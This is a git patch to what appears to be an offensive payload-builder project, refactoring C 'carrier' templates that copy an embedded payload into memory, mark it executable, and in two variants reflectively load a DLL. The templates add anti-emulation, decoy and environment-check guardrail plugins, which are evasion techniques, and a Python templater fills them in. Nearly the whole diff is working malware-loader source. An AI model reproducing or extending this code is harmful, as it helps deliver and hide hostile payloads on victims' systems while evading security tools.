From b5641214e2978b070f7a265504d35e3e7cf77f20 Mon Sep 17 00:00:00 2001
From: Dobin Rutishauser <dobin.rutishauser@gmail.com>
Date: Mon, 17 Jun 2024 05:52:56 +0200
Subject: [PATCH] refactor: fix carrier & templates (modularize)

---
 data/source/carrier/alloc_rw_rwx/template.c   | 37 ++++++-------------
 data/source/carrier/alloc_rw_rx/template.c    | 28 +++++++-------
 data/source/carrier/change_rwx_rx/template.c  | 18 +++++++++
 .../carrier/dll_loader_alloc/template.c       | 22 ++++++++++-
 .../carrier/dll_loader_change/template.c      | 35 ++++++++++--------
 data/source/decoy/none.c                      |  4 ++
 data/source/decoy/winexec.c                   |  5 ++-
 data/source/guardrails/env.c                  | 20 +++++++++-
 data/source/guardrails/none.c                 |  3 ++
 phases/templater.py                           |  2 +-
 10 files changed, 116 insertions(+), 58 deletions(-)

diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c
index 76cadac..8239785 100644
--- a/data/source/carrier/alloc_rw_rwx/template.c
+++ b/data/source/carrier/alloc_rw_rwx/template.c
@@ -17,28 +17,25 @@ char *supermega_payload;
 
 {{plugin_antiemulation}}
 
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
 
 int main()
 {
-	// Execution Guardrail: Env Check
-	wchar_t envVarName[] = L"USERPROFILE";
-	wchar_t tocheck[] = L"C:\\Users\\";
-	WCHAR buffer[1024];  // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
-	DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
-	if (result == 0) {
-		return 6;
-	}
-	if (mystrcmp(buffer, tocheck) != 0) { 
-		return 6;
+	DWORD result;
+
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
 	}
 
-	// Depends on plugin_antiemulation
+	// Call: Anti Emulation plugin
 	antiemulation();
 
-	// Decoy
-	{{plugin_decoy}}
-
-	//WinExec("C:\\windows\\system32\\notepad.exe", 1);
+	// Call: Decoy plugin
+	decoy();
 
 	// Allocate 1
     // char *dest = ...
@@ -62,13 +59,3 @@ int main()
 	return 0;
 }
 
-int mystrcmp(wchar_t* str1, wchar_t* str2) {
-	int i = 0;
-	while (str1[i] != L'\0' && str2[i] != L'\0') {
-		if (str1[i] != str2[i]) {
-			return 1;
-		}
-		i++;
-	}
-	return 0;
-}
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 04dccd4..4723cc4 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -11,6 +11,11 @@ char *supermega_payload;
 
 {{plugin_antiemulation}}
 
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+
 /* iat_reuse_rx
 
    Standard IAT reuse shellcode
@@ -20,11 +25,18 @@ char *supermega_payload;
 
 int main()
 {
-	// Depends on plugin_antiemulation
+	DWORD result;
+
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
+	}
+
+	// Call: Anti Emulation plugin
 	antiemulation();
 
-	// Decoy
-	{{plugin_decoy}}
+	// Call: Decoy plugin
+	decoy();
 
 	// Allocate 1
     // char *dest = ...
@@ -48,13 +60,3 @@ int main()
 	return 0;
 }
 
-int mystrcmp(wchar_t* str1, wchar_t* str2) {
-	int i = 0;
-	while (str1[i] != L'\0' && str2[i] != L'\0') {
-		if (str1[i] != str2[i]) {
-			return 1;
-		}
-		i++;
-	}
-	return 0;
-}
diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c
index 5251a73..8ffc5bb 100644
--- a/data/source/carrier/change_rwx_rx/template.c
+++ b/data/source/carrier/change_rwx_rx/template.c
@@ -15,11 +15,29 @@ char *supermega_payload;
    * does (rw/rx) -> rwx -> rx
 */
 
+{{plugin_antiemulation}}
+
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+
 int main()
 {
     DWORD result;
     char *dest = supermega_payload;
 
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
+	}
+
+	// Call: Anti Emulation plugin
+	antiemulation();
+
+	// Call: Decoy plugin
+	decoy();
+
     // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
     //       can do only RW otherwise?
     for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c
index 4df2b7b..f015eec 100644
--- a/data/source/carrier/dll_loader_alloc/template.c
+++ b/data/source/carrier/dll_loader_alloc/template.c
@@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 }
 
 
+{{plugin_antiemulation}}
+
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+
 int main()
 {
-	char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
+	char* dest = NULL;
+	
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
+	}
+
+	// Call: Anti Emulation plugin
+	antiemulation();
+
+	// Call: Decoy plugin
+	decoy();
+
+	dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
 
 	// FROM supermega_payload[] 
 	// TO dest[]
diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c
index 9fb9c63..0e4f3e8 100644
--- a/data/source/carrier/dll_loader_change/template.c
+++ b/data/source/carrier/dll_loader_change/template.c
@@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 		for (DWORD i = 0; i < relocationsCount; i++)
 		{
 			relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
-
-			// THIZ
 			if (relocationEntries[i].Type == 0)
 			{
 				continue;
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 			//ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
 			DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA);
 			//DWORD_PTR value = *addressToPatch;
-
 			*addressToPatch += deltaImageBase;
 			//mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
-
 		}
 	}
 
-	MessageBoxW(0, L"AAA2", L"AAA2", MB_OK);
-
 	// resolve import address table
 	PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
 	IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
@@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 }
 
 
+{{plugin_antiemulation}}
+
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+
 int main()
 {
-	// char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
-	//char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE);
 	char* dest = supermega_payload;
 	DWORD protect, oldProtect;
-	protect = PAGE_EXECUTE_READWRITE;
-	VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect);
 
-	MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK);
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
+	}
 
+	// Call: Anti Emulation plugin
+	antiemulation();
+
+	// Call: Decoy plugin
+	decoy();
+
+	VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
 
 	// FROM supermega_payload[] 
 	// TO dest[]
 	// Including decryption
-{{ plugin_decoder }}
-
-
-	MessageBoxW(0, L"ok copy", L"AAA2", MB_OK);
-
+	{{ plugin_decoder }}
 
 	// Load the DLL at dest
 	DWORD_PTR dllBase;
diff --git a/data/source/decoy/none.c b/data/source/decoy/none.c
index e69de29..1e28abf 100644
--- a/data/source/decoy/none.c
+++ b/data/source/decoy/none.c
@@ -0,0 +1,4 @@
+
+void decoy() {
+    // None
+}
\ No newline at end of file
diff --git a/data/source/decoy/winexec.c b/data/source/decoy/winexec.c
index 2519f91..99904c6 100644
--- a/data/source/decoy/winexec.c
+++ b/data/source/decoy/winexec.c
@@ -1 +1,4 @@
-WinExec("C:\\windows\\system32\\notepad.exe", 1);
\ No newline at end of file
+
+void decoy() {
+    WinExec("C:\\windows\\system32\\notepad.exe", 1);
+}
diff --git a/data/source/guardrails/env.c b/data/source/guardrails/env.c
index 17741f8..d98755c 100644
--- a/data/source/guardrails/env.c
+++ b/data/source/guardrails/env.c
@@ -1,3 +1,18 @@
+
+
+int mystrcmp(wchar_t* str1, wchar_t* str2) {
+	int i = 0;
+	while (str1[i] != L'\0' && str2[i] != L'\0') {
+		if (str1[i] != str2[i]) {
+			return 1;
+		}
+		i++;
+	}
+	return 0;
+}
+
+
+int executionguardrail() {
 	// Execution Guardrail: Env Check
 	wchar_t envVarName[] = L"USERPROFILE";
 	wchar_t tocheck[] = L"C:\\Users\\";
@@ -8,4 +23,7 @@
 	}
 	if (mystrcmp(buffer, tocheck) != 0) { 
 		return 6;
-	}
\ No newline at end of file
+	}
+    return 0;
+}
+
diff --git a/data/source/guardrails/none.c b/data/source/guardrails/none.c
index e69de29..aa67afe 100644
--- a/data/source/guardrails/none.c
+++ b/data/source/guardrails/none.c
@@ -0,0 +1,3 @@
+int executionguardrail() {
+    // None
+}
\ No newline at end of file
diff --git a/phases/templater.py b/phases/templater.py
index 44c0185..e76da2b 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
         'plugin_decoder': plugin_decoder,
         'plugin_antiemulation': plugin_antiemualation,
         'plugin_decoy': plugin_decoy,
-        'plugin_guardrails': plugin_guardrails,
+        'plugin_executionguardrail': plugin_guardrails,
         'PAYLOAD_LEN': payload_len,
     })
     with open(settings.main_c_path, "w", encoding='utf-8') as file: